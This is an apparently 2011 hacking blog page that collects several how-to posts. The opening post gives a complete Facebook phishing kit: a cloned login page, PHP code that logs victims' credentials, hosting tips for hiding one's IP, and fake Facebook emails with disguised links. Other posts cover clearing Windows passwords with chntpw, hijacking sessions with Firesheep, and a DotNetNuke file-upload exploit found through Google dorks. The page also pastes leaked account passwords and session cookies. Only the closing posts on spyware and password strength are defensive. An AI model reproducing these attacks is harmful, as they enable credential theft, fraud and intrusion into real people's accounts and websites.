Friday, 23 December 2011

How to Hack Facebook Account Using Phising webPage

Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.



Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:


The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "next.php" to store the password.  so open the notepad and type the following code:

<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "next.php"

Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
 Mark it and push the Add hyperlink button
*Updated*  
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  






Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 



Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.


Don't use this method for hacking others account. This article is for educational purpose only. Here is tips to prevent from Phishing Web page:
How to prevent from Phishing Web page?

Wupload Premium Accounts

Wupload Premium Accounts

Username : solsjear@gmail.com
Password : 6TJ2sOVlS

Username : okanduzgun.com
Password : 6TJ2sOVlS

Username : solsjear@gmail.com
Password : 6TJ2sOVlS

Username : okanduzgun.com
Password : 6TJ2sOVlS


http://www.livepremiumcookies.com
http://www.livepremiumcookies.blogspot.com/

How To Remove A Windows Password (All Versions) Using Backtrack

Download Backtrack 3 or Backtrack 4 from http://www.backtrack-linux.org/downloads/ Burn the iso file with your favorite burning software.
For this tutorial I am using Backtrack 3, and will be removing my password on Windows 7 Professional.
Step 1. Restart your PC with the Backtrack disc in your drive and boot from the
cd/dvd. You don’t have to do anything once the bootup process starts. It will
take about 2-4 minutes depending on your hardware setup. Once you get to your
Desktop we are ready to begin.


Step 2. The first thing we need to do is find out what Backtrack has labeled your C: Drive As. So click on the K button which looks like this  (From now on i will refer to this as the start button for all you Windows fans.) From the start menu go to System > System Information > Partitions. Find you C: Drive (which will be labeled as NTFS) and look under the mount point category. Mine is labeled as /mnt/sda1.This also can be labeled as hda1, hda0, sda0 or any other combination. Its important that you know this for later on so make a note of it.
Step 3. Click on the start button Go to the Backtrack Folder > Priveleged Escalation > Password Attacks > chntpw. This will bring up a command line interface.
Step 4. At the bt chntpw# prompt type the following command and press enter.

Code:
chntpw -i /mnt/sda1/Windows/System32/config/SAM
You will now get some options and it will look like this

You must note that this command is very case sensitive.
Code:
chntpw -i /mnt/sda1/Windows/System32/config/SAM
You need caps and lower case where required. If your unsure of the spelling in the path name click on the 3rd button on the task bar. Looks like this  This is called Konqueror and is equal to Windows Explorer. Browse through Windows/System32/config/SAM and make sure you get the spelling perfect otherwise the command will not work. XP, Vista and 7 are all different so I recommend you
do this just to ensure you have no errors.
Step 5. We want to Edit user data and passwords so press 1 and hit enter

Step 6. Type the name of the user of which you want to remove there password
(preferably an administrator account) and press enter. For this tutorial I will
use my Windows account

Step 7. We now want to Clear (blank) user password. Press 1 and hit enter

Step 8. You should get a Password cleared! message (YES!!!)

Step 9. These next couple of steps are very important. We now need to make
sure that the account is not locked out.

Step 10. Type the same user name as you did in step 6. and press enter
Step 11. Now we need to Unlock and enable user account so type 4 and press enter

Step 12. You should get the message Unlocked!

Step 13. Now we are pretty much done we just need to quit and save so type ! and press enter
Step 14. Type q and press enter

Step 15. Type y to Write hive files and press enter

Step 16. Done!! YEAH!!! You can now restart your computer and boot up to
Windows. (go to start > logout > restart) If you only have one user account it should automatically log you in. But if it doesn’t all you will have to do
is click on your username and no password will be required. Note that when you
restart, your cd/dvd drive will automatically eject your live cd/dvd media


You need caps and lower case where required. If your unsure of the spelling in the path name click on the 3rd button on the task bar. Looks like this  Thi

Get Free Premium Services Trials and Discounts with Internet Explorer 9


I know the old joke was that IE is a terrible browser, but Microsoft has really shored up its browser’s deficiencies to make it ironically very secure and competent. This holiday season, Microsoft is really pushing hard to get people to change perceptions and get people to adopt Internet Explorer 9 (Windows Vista and up). As part of that PR campaign, the folks at Redmond are partnering with some great companies like Grooveshark, Pandora, and Hulu to offer you some cool free stuff and discounts simply for using IE9. Remember that all you have to do is use IE to access one site, and then you never have to use it again if you really hate it. Here’s a list of all the stuff you can get:
  • Three Free Months of Slacker Premium Radio
  • Three Free Months of AOL Radio
  • One Free Month of Grooveshark Plus
  • One Free Month of Hulu Plus
  • One Free Movie in your Flixster movie locker
  • $5 off movie ticket from Fandango
  • $5 off your next Live Nation Ticket
  • One Free Month of Vimeo Plus
  • 20 Free Horseshoes in Zynga’s “Pioneer Trail” Game
  • One Free Month of Pandora One
To get all these free offers, first open up IE9. If you don’t have it, you can download it here (be sure to select the right version for your copy of Windows). Next, visit this page within IE9. Click on the offer you want to redeem, then click and drag the large icon to your taskbar (the large bar usually found at the bottom of the screen). After doing so, another IE window will launch taking you to the offer provider’s website where you can redeem your freebie. Afterwards, you can remove the pinned icon by right clicking it and choosing “Unpin this program from taskbar.” Happy holidays, and enjoy all these free great offers!

Thursday, 22 December 2011

Wupload premium cookies

65x Wupload Premium Working Cookies 12/23/2011

mvd8acegoljs1ql99upa07k5a5
butphielulg5jkq07it6ch1ab0
pg7c5unv1gpil9rmsgdfs8m1q4
68hsh0r57b5234a1nf7o19qcc1
vb438r4f7r1kagd5hajjhuq5l5
1fvh96uhenv3h6lvj22q35ju30
2o2d8pifl809r9q0uvr1hcv421
oabsnjkuat672j8l94msjpilp7
han0p66o43nunl9upqq3pnidj2
rqjlrf6jmfvnadcdt9js7vqv05
l320oj3flhombqplkf60383m30
dt9rhhg1r77e3p56va2q782pd1
48t6vq2u8n60ndp7f67e4t56q6
3m1cr2f1eriujg6j62hhc6ts10
2ndd05rpthtgpart2ifrmvn9c7
cto5mckhp7midvqg0bhaih49n5
07f9lajknnf5chcp1aa1rvkj46
g0chb3uon3d21tceh2qi98tvm2
tkkjm1pha54evchvb6sss48805
tolg6otivc7o1hoc51vqjnni57
oa419ei66h0g0scnkvvv1pp691
291klt4a306p41rt8qbv5u05i4
sbh3pflcps9gbustm3fs1ktdq3
0pg6iip81huh3dee6pa94t8hn2
n5f6pk6asqiarrd2r9gl74emp5
3nn64bh9tfh0ojr2poshu6lrc6
c2dcbmvko2a7gh0sphtvj8obv4
v6799e3qgkq6hkdlkd6ueo7sv2
36naarqkduo7fhu2id5e6ubdp7
4p0v539k3rmcd5m2j4u6n59tg4
he25vnu9ivo3kd1su35c4kim66
mscqsiguttq44ofsrbrbepqim5
e7rborrg7pa7003felltkqpfs7
h5fultucl558lg8kb0hdbp4fg1
miu19h2kgu3hfpnfv4ig9n4c30
uhva9a52ljbhe6l16lk1v6tvb0
ubasclq1igg6a9dehoghjkdv53
v8kc1uoqfa7dkddqb5tsvefjr0
1oq2ki8nleb9ns4gkj18l7a6m0
ag2tsbr2bcjr1r76jn57ir7a45
5l98k02846h9p5jdg81pbv4lh0
dt3ehq4gteuijpqjnf6ei5odq0
s6r1u5p0msj1ke1j97suitb817
3qdnef539ddigaj36summtq431
gftq8fmvs98v3n5gaj4u6j8952
5kchr24clfudugu8nohsidet91
l64b2ihq7nst680b8t40pjbq33
v6f21nf1aj61o9punp27f39n44
7jc1u13imomm0eeoeosmmtfqb7
eik060j3atcgv3pplp95lc6804
00u1d2mhfm6fdfvrng04b699q5
3gqdu8o92lu0fd369ai38f6og6
gs256phcmnatvo9tog9fk6qh71
umv11t8g17fpdrs4qmja28qrj3
rg24a5ro9sb7dk8a332r5g2or5
a6v5nj69ferhlt6f84bim15ri1
f3jhh4bg0fs6a2qeruli45vea1
10dt63uckf90ujpjpo51thfrp5
dj1bjeqjrbjpfjlmkifh71erc4
vm2is4vbabplte1pi55gfh7700
t3v866b8u1dkhbk3gd26dr3qu0
fm3ekmgr9l15cd3nph5n4ecr93
ra2ve4m9p8v760v63lgfeg1dc1
sf97n2t4p1s6ajpg0au86n1gj7
ktdeqjp7ingvgnon0lia8vmnb7

Reliance 3G Speed Hack 2011- 100% Working

Hey guys! Again back with a bang to show you Reliance 3G hack for High speed downloading and surfing at broadband terms. All you have to do the following trick plus some settings to enjoy it responsibly. This trick is tested by me in Punjab successfully and hope will work fine in all other states of India etc..

Trick 1-
Note: Always try at low balance only.
Subscribe Internet by trying *123*099# and to check your Usage – dial #367 and listen. If you are getting Message as ” Unable to Process request ” then keep on trying. This Message is due to network problem. The plan offers 2.5 GB for 1 month + additional 99 rs of net usage.
You can use both rcommms and rcomnet.
Here is settings for Different APN working with Reliance.
1. rcomnet – Just write APN as rcomnet and leave everything as default. No proxy and port needed.
2. rcommms / rcomwap – APN – rcommms (No disconnection) or rcomwap
Proxy no. – 10.239.221.22 or 10.239.221.5
Port Port- 8080
When your 2.5 GB is over then u can re-subscribe the plan again by-
First u need to unsubscribe by sending sms Unsub 8024 to 155223 or Unsub 8022 to 155223. If u get no Default configured message then call 155223 and then select language by pressing 1 for English and 2 for Hindi.
Then type code as 2084 and press 1 to confirm. After that u will also get message as you have successfully unsubscribed.
Now subscribe again by dialing *123*099# and enjoy the plan trick/hack again.
Trick 2-
New Reliance Free GPRS Trick with UC Browser 7.7 & Opera Mini 6 Handler.
Step 1 - Download Opera Mini Handler from Here
Step 2 -Install it in your Mobile and use your default RCOMWAP Settings for s60 users.
Step 3- Now in the handler menu just use these settings below by the backstring box. 
?id=mobileweaver-326-1275050095372&url=http://www.rcom.co.in
Step 4 – Done ! Now Enjoy Free Gprs in your Reliance Mobile.
Note - Minimum Balance will be 1 rs to use this trick.
Enjoy Free Gprs in Reliance Mobile for Lifetime.

Hack Facebook and Twitter Password on Wi-Fi Using Firesheep

Accessing your Facebook or Twitter account on public networks like your college, office or any unsecured Wi-Fi always possess a risk to be hacked. This is why because they are not using httpsprotocol like Gmail or any other. Therefore, today we are going to learn a simple trick to hack Facebook and twitter accounts on Wi-Fi and also themethod of protection from it etc..

Procedure-

1. First of all Download firesheep which means an Firefox extension.
2. After installing it, now it can open a sidebar window into your Firefox browser.
3. Therefore, it will show all the people who are connected to unsecured Wi-Fi network at that place. Once they login into your Facebook or twitter account, you will get a notification and with a single click you can login into their accounts easily.
Principle of Working behind it – Cookie Hijacking mainly.
Protection - The best way to protect yourself from such a hacking trick is to avoid using your Facebook or twitter accounts on a unsecured Wi-Fi networks as it is security less loopholes in it.

Website Hacking Technique Through DNN

DNN Today I have founded a new way of web hacking known as DNN - DOTNetNukewhich allows us to upload any thing to the web server of your victims domain etc.. Actually DotNetNuke is an open source web content management system based on Microsoft .NET technology. Please perform this attack in Google chrome, Mozilla Firefox or Opera only. Below is the procedure to perform it by simply using Google search engine.

Procedure

1. Open www.google.com
2. then search this dork to find vulnerable sites using Google or you can also find it yourself by doing other methods also…
:inurl:/tabid/36/language/en-US/Default.aspx
3. Now you will find many websites in the Google search as given below-
google hack DNN
4. Choice one of the sites above and open it in the browser.
5. For ex- you choose- http://www.xyz.com/Home/tabid/36/Language/en-US/Default.aspx  where xyz is domain name
6. Now replace-  /Home/tabid/36/Language/en-US/Default.aspx 
                                        with this                            /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
7. and hit enter…
8. Hence, you will see this screen in the browser-
demo
8. Choose the 3rd option above and then at the address bar, type this JavaScript below-
javascript:__doPostBack('ctlURL$cmdUpload','')
9. Done! Now you have the upload option coming at the site like this-
demo 2
10. Now you can upload any type of file you want as for ex- txt, swf, jpg, gif, pdf Files etc..
11. After uploading files, your file is save in root folder and your address will be such ashttp://www.xyz.com/portals/0/krackoworld.txt and have full access.
12. Chapter closed here…
Tip - You can also use Google dork such as inurl:"/portals/0" to find more vulnerable sites above.

Spyware, a real threat that can overwhelm you!

Spyware, a real threat that can overwhelm you! As its name says it all, the word “spyware” refers to undercover software, which is spread by advertising agencies to spy on you. Spyware is also recognized as “adware”. Spyware is basically malicious software, which gets installed on your computer inevitably. Some of the advertising agencies use spyware to lure you into purchasing their software. A spyware usually shows you false pop-ups and fake error messages, which seem to be quite genuine to attract you, so that you can click on them. 
The fake error messages or pop-ups usually appear as banners, ads, apps and so on. Once you click on any of the pop-ups, you are taken to the malicious website. Some types of spyware can even record what keys you type on your keyboard. In order to avoid spyware infections, you have to install anti-spyware.
    

Why anti-spyware is important?

Most of the anti-spyware software offers real-time protection that can block spywareinstallation. In addition, anti-spyware programs are capable enough to track your web surfing activities, and lock your browser, so that it can’t be changed by spyware. The anti-spyware techniques come in very handy for online surfing that is why, anti-spyware programs are recommended to download. Here are some free anti-spyware programs for Mac OS X:

Sophos Anti-Virus for Mac

Sophos Anti-Virus Home Edition is completely free and simple to install on your Mac. It is really very easy to use. It keeps your Mac protected from viruses, spyware, Trojan horses, and worms, without even affecting the processing speed of the system. Best thing about Sophos Anti-Virus is that it offers comprehensive anti-virus solutions. You receive top quality 24/7 business-grade protection support from SophosLabs experts. Sophos just not only protects your system from the known threats, but it also saves you from unknown threats.
Sophos Anti-Virus offers wide range of strong and powerful features that you expect from a top quality paid anti-virus. Sophos efficiency and reliability is well-known, it will not annoy you with unnecessary warnings. Once it’s installed on your Mac, it will quietly run scans in the background. All you need to do is to check it rarely to make sure everything is smooth and on track. It also allows you to run custom scans. So, it totally depends upon you, how you want to use it.

ClamXav for Mac

ClamXav is a free anti-virus program that gives you limited real-time protection against security threats. ClamXav has the ability to scan email attachments and run custom scans. ClamXav supports limited Mac operating systems, such as Tiger, Leopard, Panther, and Jaguar. It is based on ClamAV scanning search engine, which allows it to offer protection against both Intel based and PowerPC systems. ClamXav is best suited for home-based Macs. If you’re a corporate Mac user, then it’s best for you to go for any other free anti-spyware tool, because it offers only limited features. ClamXav might not attract you with complete set of features, but it’s free to download, and worth giving a shot!

About the Guest Author-

This guest article has been contributed by Timothy Edmonds. Tim Edmonds is a freelancetechnical writer with over a decade of professional experience. He is currently interested in the reviews of mac cleanup software.

latest facebook hack

youtube,youporn,redtube fastest downloader

How To Hack Wireless

password setup

Do you think the passwords you use to access your most sensitive data is secure enough? Do you constantly read expert advice advice on using strong passwords but never feel you really need to, because you think your odds of getting hacked are slim? CEO of web company iFusion Labs and Internet standards expert John Pozadzides has just written an excellent piece that should make you sit up straight and take notice. This article should be on everyone’s must read list to help us better understand the security of our own passwords and how to bolster that security.
If you invited me to try and crack your password, you know the one that you use over and over for like every web page you visit, how many guesses would it take before I got it?
Let’s see… here is my top 10 list. I can obtain most of this information much easier than you think, then I might just be able to get into your e-mail, computer, or online banking. After all, if I get into one I’ll probably get into all of them.
  1. Your partner, child, or pet’s name, possibly followed by a 0 or 1 (because they’re always making you use a number, aren’t they?)
  2. The last 4 digits of your social security number.
  3. 123 or 1234 or 123456.
  4. “password”
  5. Your city, or college, football team name.
  6. Date of birth – yours, your partner’s or your child’s.
  7. “god”
  8. “letmein”
  9. “money”
  10. “love”
Statistically speaking that should probably cover about 20% of you. But don’t worry. If I didn’t get it yet it will probably only take a few more minutes before I do…
Hackers, and I’m not talking about the ethical kind, have developed a whole range of tools to get at your personal data. And the main impediment standing between your information remaining safe, or leaking out, is the password you choose. (Ironically, the best protection people have is usually the one they take least seriously.)
One of the simplest ways to gain access to your information is through the use of a Brute Force Attack. This is accomplished when a hacker uses a specially written piece of software to attempt to log into a site using your credentials. Insecure.org has a list of the Top 10 FREE Password Crackers right here.
So, how would one use this process to actually breach your personal security? Simple. Follow my logic:
  • You probably use the same password for lots of stuff right?
  • Some sites you access such as your Bank or work VPN probably have pretty decent security, so I’m not going to attack them.
  • However, other sites like the Hallmark e-mail greeting cards site, an online forum you frequent, or an e-commerce site you’ve shopped at might not be as well prepared. So those are the ones I’d work on.
  • So, all we have to do now is unleash Brutuswwwhack, or THC Hydra on their server with instructions to try say 10,000 (or 100,000 – whatever makes you happy) different usernames and passwords as fast as possible.
  • Once we’ve got several login+password pairings we can then go back and test them on targeted sites.
  • But wait… How do I know which bank you use and what your login ID is for the sites you frequent? All those cookies are simply stored, unencrypted and nicely named, in your Web browser’s cache. (Read this post to remedy that problem.)
And how fast could this be done? Well, that depends on three main things, the length and complexity of your password, the speed of the hacker’s computer, and the speed of the hacker’s Internet connection.
Assuming the hacker has a reasonably fast connection and PC here is an estimate of the amount of time it would take to generate every possible combination of passwords for a given number of characters. After generating the list it’s just a matter of time before the computer runs through all the possibilities – or gets shut down trying.
Pay particular attention to the difference between using only lowercase characters and using all possible characters (uppercase, lowercase, and special characters – like @#$%^&*). Adding just one capital letter and one asterisk would change the processing time for an 8 character password from 2.4 days to 2.1 centuries.
How I’d Hack Your Weak Passwords
Remember, these are just for an average computer, and these assume you aren’t using any word in the dictionary. If Google put their computer to work on it they’d finish about 1,000 times faster.
Now, I could go on for hours and hours more about all sorts of ways to compromise your security and generally make your life miserable – but 95% of those methods begin with compromising your weak password. So, why not just protect yourself from the start and sleep better at night?
Believe me, I understand the need to choose passwords that are memorable. But if you’re going to do that how about using something that no one is ever going to guess AND doesn’t contain any common word or phrase in it.
Here are some password tips:
  1. Randomly substitute numbers for letters that look similar. The letter ‘o’ becomes the number ‘0′, or even better an ‘@’ or ‘*’. (i.e. – m0d3ltf0rd… like modelTford)
  2. Randomly throw in capital letters (i.e. – Mod3lTF0rd)
  3. Think of something you were attached to when you were younger, but DON’T CHOOSE A PERSON’S NAME! Every name plus every word in the dictionary will fail under a simple brute force attack.
  4. Maybe a place you loved, or a specific car, an attraction from a vacation, or a favorite restaurant?
  5. You really need to have different username / password combinations for everything. Remember, the technique is to break into anything you access just to figure out your standard password, then compromise everything else. This doesn’t work if you don’t use the same password everywhere.
  6. Since it can be difficult to remember a ton of passwords, I recommend using Roboform for Windows users. It will store all of your passwords in an encrypted format and allow you to use just one master password to access all of them. It will also automatically fill in forms on Web pages, and you can even get versions that allow you to take your password list with you on your PDA, phone or a USB key. If you’d like to download it without having to navigate their web site here is the direct download link(Ed. note: Lifehacker readers love the free, open-source KeePass for this duty, while others swear by the cross-platform, browser-based LastPass.)
  7. Mac users can use 1Password. It is essentially the same thing as Roboform, except for Mac, and they even have an iPhone application so you can take them with you too.
  8. Once you’ve thought of a password, try Microsoft’s password strength tester to find out how secure it is.
By request I also created a short RoboForm Demonstration video. Hope it helps…
Another thing to keep in mind is that some of the passwords you think matter least actually matter most. For example, some people think that the password to their e-mail box isn’t important because “I don’t get anything sensitive there.” Well, that e-mail box is probably connected to your online banking account. If I can compromise it then I can log into the Bank’s Web site and tell it I’ve forgotten my password to have it e-mailed to me. Now, what were you saying about it not being important?
Often times people also reason that all of their passwords and logins are stored on their computer at home, which is safe behind a router or firewall device. Of course, they’ve never bothered to change the default password on that device, so someone could drive up and park near the house, use a laptop to breach the wireless network and then try passwords from this list until they gain control of your network — after which time they will own you!
Now I realize that every day we encounter people who over-exaggerate points in order to move us to action, but trust me this is not one of those times. There are 50 other ways you can be compromised and punished for using weak passwords that I haven’t even mentioned.
I also realize that most people just don’t care about all this until it’s too late and they’ve learned a very hard lesson. But why don’t you do me, and yourself, a favor and take a little action to strengthen your passwords and let me know that all the time I spent on this article wasn’t completely in vain.
Please, be safe. It’s a jungle out there.


Details: http://thetechjournal.com/electronics/computer/security-computer-electronics/heres-how-easily-a-hacker-can-crack-your-weak-passwords.xhtml#ixzz1hKGwY2Sw